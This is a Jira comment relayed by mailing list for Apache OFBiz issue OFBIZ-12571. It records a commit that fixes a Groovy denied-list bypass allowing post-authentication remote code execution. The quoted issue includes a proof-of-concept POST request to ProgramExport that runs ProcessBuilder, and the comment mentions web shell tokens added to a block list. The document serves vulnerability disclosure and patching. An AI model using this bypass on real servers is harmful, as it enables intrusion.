[jira] [Commented] (OFBIZ-12571) Groovy denied list bypass causes post-auth RCE from webtools/control/ProgramExport

Fri, 11 Feb 2022 02:04:09 -0800 


    [ 
https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17490809#comment-17490809
 ] 

ASF subversion and git services commented on OFBIZ-12571:
---------------------------------------------------------

Commit 28092f2a7568634c1dd9c6c70f3656f13ca7a431 in ofbiz-framework's branch 
refs/heads/trunk from Jacques Le Roux
[ https://gitbox.apache.org/repos/asf?p=ofbiz-framework.git;h=28092f2 ]

Fixed: Groovy denied list bypass causes post-auth RCE from 
webtools/control/ProgramExport (OFBIZ-12571)

The 1st issue was due to use of processbuilder token. It has been added to
deniedWebShellTokens in security.properties by f2cf262 commit for OFBIZ 11948
The tokens function (for js) and class have been added since while browsing
https://github.com/tennc/webshell

As mention the related deniedWebShellTokens TODO comment: "TODO.... to be 
continued
with known webshell contents... a complete allow list is impossible anyway...

So, later a deeper review of Groovy sandbox possibilities will be done..

Thanks: Y4er for report


> Groovy denied list bypass causes post-auth RCE from 
> webtools/control/ProgramExport
> ----------------------------------------------------------------------------------
>
>                 Key: OFBIZ-12571
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12571
>             Project: OFBiz
>          Issue Type: Bug
>          Components: framework/webtools
>    Affects Versions: 18.12.05
>         Environment: ofbiz 18.12.05
>            Reporter: Y4er
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.06, 22.01.01
>
>         Attachments: image-2022-02-10-17-50-58-914.png
>
>
> groovy blacklist bypass cause post-auth RCE from 
> webtools/control/ProgramExport
>  
> {code:java}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; 
> webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!



--
This message was sent by Atlassian Jira
(v8.20.1#820001)

Reply via email to